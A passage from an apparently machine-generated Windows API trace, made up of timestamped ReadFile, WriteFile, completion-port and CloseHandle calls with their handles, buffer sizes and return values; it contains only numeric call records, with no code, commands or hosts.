nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x710020) returned 1 [0157.528] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0157.528] CloseHandle (hObject=0x1ac) returned 1 [0157.544] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0157.545] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.430] WriteFile (in: hFile=0x1a8, lpBuffer=0x36c0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x36c0020) returned 1 [0159.433] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.433] ReadFile (in: hFile=0x194, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2690020) returned 0x0 [0159.433] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.433] ReadFile (in: hFile=0x1c0, lpBuffer=0x3480124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3480020) returned 0x0 [0159.433] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.433] ReadFile (in: hFile=0x1a0, lpBuffer=0x35a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x35a0020 | out: lpBuffer=0x35a0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x35a0020) returned 0x0 [0159.433] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.433] ReadFile (in: hFile=0x1a8, lpBuffer=0x36c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x36c0020) returned 0x0 [0159.433] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0159.434] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0159.434] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0159.434] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0159.434] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0159.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.434] WriteFile (in: hFile=0x194, lpBuffer=0x2690094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020) returned 1 [0159.437] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.437] ReadFile (in: hFile=0x1b8, lpBuffer=0x37e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x37e0020 | out: lpBuffer=0x37e0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x37e0020) returned 0x0 [0159.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.438] ReadFile (in: hFile=0x1c, lpBuffer=0x3900124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3900020) returned 0x0 [0159.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.438] ReadFile (in: hFile=0x1e0, lpBuffer=0x3a20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3a20020) returned 0x0 [0159.438] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.438] CloseHandle (hObject=0x194) returned 1 [0159.442] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2690020) returned 1 [0159.445] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.445] WriteFile (in: hFile=0x1e0, lpBuffer=0x3a20094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3a20020 | out: lpBuffer=0x3a20094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3a20020) returned 1 [0159.456] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0159.457] CloseHandle (hObject=0x1c) returned 1 [0159.478] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0159.481] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.407] ReadFile (in: hFile=0x1f4, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3630020) returned 1 [0160.407] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.421] ReadFile (in: hFile=0x1d0, lpBuffer=0x3750124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3750020) returned 1 [0160.421] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.421] ReadFile (in: hFile=0x1c0, lpBuffer=0x3870124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3870020 | out: lpBuffer=0x3870124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3870020) returned 1 [0160.421] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.422] WriteFile (in: hFile=0x1c, lpBuffer=0x3510124*, nNumberOfBytesToWrite=0x1417c, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3510020) returned 1 [0160.429] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.429] WriteFile (in: hFile=0x1d0, lpBuffer=0x3750124*, nNumberOfBytesToWrite=0xc9a0, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3750020 | out: lpBuffer=0x3750124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3750020) returned 1 [0160.434] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.437] WriteFile (in: hFile=0x1e8, lpBuffer=0x3cf0124, nNumberOfBytesToWrite=0x6b3c, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3cf0020 | out: lpBuffer=0x3cf0124, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3cf0020) returned 0x0 [0160.461] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.465] WriteFile (in: hFile=0x1c4, lpBuffer=0x3990094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3990020 | out: lpBuffer=0x3990094*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3990020) returned 1 [0160.479] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.479] ReadFile (in: hFile=0x1e8, lpBuffer=0x3cf0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3cf0020 | out: lpBuffer=0x3cf0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3cf0020) returned 0x0 [0160.479] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.479] CloseHandle (hObject=0x1b4) returned 1 [0160.519] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0160.519] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.519] CloseHandle (hObject=0x1d0) returned 1 [0160.538] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3750020) returned 1 [0160.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 0 [0160.540] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3cf0020) returned 1 [0160.540] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.540] CloseHandle (hObject=0x198) returned 1 [0160.553] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3ab0020) returned 1 [0160.556] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0160.559] CloseHandle (hObject=0x1dc) returned 1 [0160.571] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3bd0020) returned 1 [0160.573] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.006] ReadFile (in: hFile=0x1e4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3680020) returned 1 [0168.006] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.006] ReadFile (in: hFile=0x1a0, lpBuffer=0x37a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x37a0020) returned 1 [0168.006] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.006] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x38c0020) returned 1 [0168.007] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.007] ReadFile (in: hFile=0x198, lpBuffer=0x39e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x39e0020) returned 1 [0168.007] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.007] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b00124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3b00020) returned 1 [0168.007] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.007] ReadFile (in: hFile=0x1a8, lpBuffer=0x3c20124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124*, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3c20020) returned 1 [0168.008] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.008] WriteFile (in: hFile=0x1d0, lpBuffer=0x2690124*, nNumberOfBytesToWrite=0x15e53, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x2690020) returned 1 [0168.008] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.009] WriteFile (in: hFile=0x1e4, lpBuffer=0x3680124*, nNumberOfBytesToWrite=0xc557, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3680020) returned 1 [0168.009] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.009] WriteFile (in: hFile=0x1a0, lpBuffer=0x37a0124*, nNumberOfBytesToWrite=0x13df, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x37a0020) returned 1 [0168.009] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.009] WriteFile (in: hFile=0x1ec, lpBuffer=0x38c0124*, nNumberOfBytesToWrite=0x109f6, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x38c0020) returned 1 [0168.010] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.010] WriteFile (in: hFile=0x198, lpBuffer=0x39e0124*, nNumberOfBytesToWrite=0x15f86, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x39e0020) returned 1 [0168.010] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.011] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b00124*, nNumberOfBytesToWrite=0xbfb, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3b00020 | out: lpBuffer=0x3b00124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3b00020) returned 1 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.011] WriteFile (in: hFile=0x1a8, lpBuffer=0x3c20124*, nNumberOfBytesToWrite=0x3998, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124*, lpNumberOfBytesWritten=0x2d4f988, lpOverlapped=0x3c20020) returned 1 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.011] ReadFile (in: hFile=0x1d0, lpBuffer=0x2690124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x2690020 | out: lpBuffer=0x2690124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x2690020) returned 0x0 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.011] ReadFile (in: hFile=0x1e4, lpBuffer=0x3680124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x3680020 | out: lpBuffer=0x3680124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x3680020) returned 0x0 [0168.011] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.011] ReadFile (in: hFile=0x1a0, lpBuffer=0x37a0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x37a0020 | out: lpBuffer=0x37a0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x37a0020) returned 0x0 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.012] ReadFile (in: hFile=0x1ec, lpBuffer=0x38c0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x38c0020) returned 0x0 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c) returned 1 [0168.012] ReadFile (in: hFile=0x198, lpBuffer=0x39e0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x2d4f988, lpOverlapped=0x39e0020 | out: lpBuffer=0x39e0124, lpNumberOfBytesRead=0x2d4f988*=0x0, lpOverlapped=0x39e0020) returned 0x0 [0168.012] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x2d4f988, lpCompletionKey=0x2d4f984, lpOverlapped=0x2d4f98c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2d4f988, 